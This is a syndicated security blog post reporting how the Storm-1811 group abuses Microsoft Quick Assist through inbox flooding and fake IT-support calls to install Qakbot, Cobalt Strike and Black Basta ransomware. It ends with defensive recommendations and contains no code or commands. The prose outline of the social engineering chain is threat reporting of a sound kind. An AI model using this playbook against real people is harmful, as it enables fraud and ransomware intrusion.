Recent reports claim that the Microsoft Threat Intelligence team stated that a cybercriminal group, identified as Storm-1811, has been exploiting Microsoft’s Quick Assist tool in a series of social engineering attacks. This group is known for deploying the Black Basta ransomware attack. On May 15, 2024, Microsoft released details about how this financially motivated group uses Quick Assist to target victims.
Storm-1811’s attack strategy involves impersonation and voice phishing to deceive victims into installing remote monitoring and management (RMM) tools. Once these tools are in place, the attackers deliver malware such as Qakbot malware and Cobalt Strike, which ultimately leads to the deployment and execution of the Black Basta ransomware attack.
The group leverages Quick Assist by pretending to be trusted contacts, such as Microsoft technical support or IT professionals from the victim’s company. Quick Assist, a legitimate Microsoft application, allows users to share their device with another person for troubleshooting purposes. This tool is pre-installed on Windows 11 devices, making it easily accessible for exploitation.
To make their attacks more believable, the cybercriminals employ a tactic known as link listing attacks. This involves signing up target email addresses for numerous legitimate email subscriptions, overwhelming the inbox with various content. The attackers then pose as the company’s IT support team, contacting the victim via phone and offering assistance to resolve the spam issue. They persuade the victim to grant remote access through Quick Assist.
Once access is granted, the attackers execute a scripted cURL command to download malicious payloads, often in the form of batch or ZIP files. This initial access allows them to perform further activities like domain enumeration and lateral movement within the network. Ultimately, Storm-1811 uses PsExec to distribute Black Basta ransomware across the network.
Microsoft is actively addressing the misuse of Quick Assist in these attacks. They are working on incorporating warning messages within the software to alert users about potential tech support scams that could lead to ransomware attacks.
The campaign, which began in mid-April 2024, has targeted various industries including manufacturing, construction, food and beverage, and transportation. According to Rapid7, the attacks are opportunistic, leveraging the low barrier to entry and significant impact to effectively achieve financial gain.
Robert Knapp, senior manager of incident response services at Rapid7, highlighted the persistent threat posed by ransomware due to its ease of execution and substantial impacts on victims.
Microsoft describes Black Basta as a “closed ransomware offering” rather than a ransomware-as-a-service (RaaS) operation. This means it is distributed by a small group of threat actors who often rely on other cybercriminals for initial access, infrastructure, and malware development.
Since its emergence in April 2022, Black Basta has typically been deployed following access gained through QakBot and other malware, underscoring the importance of preventing initial compromise to mitigate ransomware threats.
Implementing Microsoft security recommendations is essential for safeguarding your digital assets and mitigating potential cyber threats effectively. Data encryption plays a vital role in securing sensitive information and ensuring data privacy in today’s digital landscape.
Organizations are advised to block or uninstall Quick Assist and similar remote management tools if they are not necessary. Additionally, training employees to recognize tech support scams can help prevent such attacks. Focusing on detecting and mitigating threats before the deployment of ransomware is crucial for reducing overall risk.
In conclusion, the exploitation of Microsoft’s Quick Assist feature by the Storm-1811 group to deploy the Black Basta ransomware attack highlights the ongoing challenges in cybersecurity and the importance of employing cybersecurity best practices. Ensuring remote access tools security is crucial for protecting sensitive information and maintaining robust cybersecurity measures within an organization. By understanding the tactics used and taking proactive measures, organizations can better protect themselves against these sophisticated threats.
The sources for this piece include articles in The Hacker News and Security Week.
The post Black Basta Ransomware Attack: Microsoft Quick Assist Flaw appeared first on TuxCare.
*** This is a Security Bloggers Network syndicated blog from TuxCare authored by Wajahat Raja. Read the original post at: https://tuxcare.com/blog/black-basta-ransomware-attack-microsoft-quick-assist-flaw/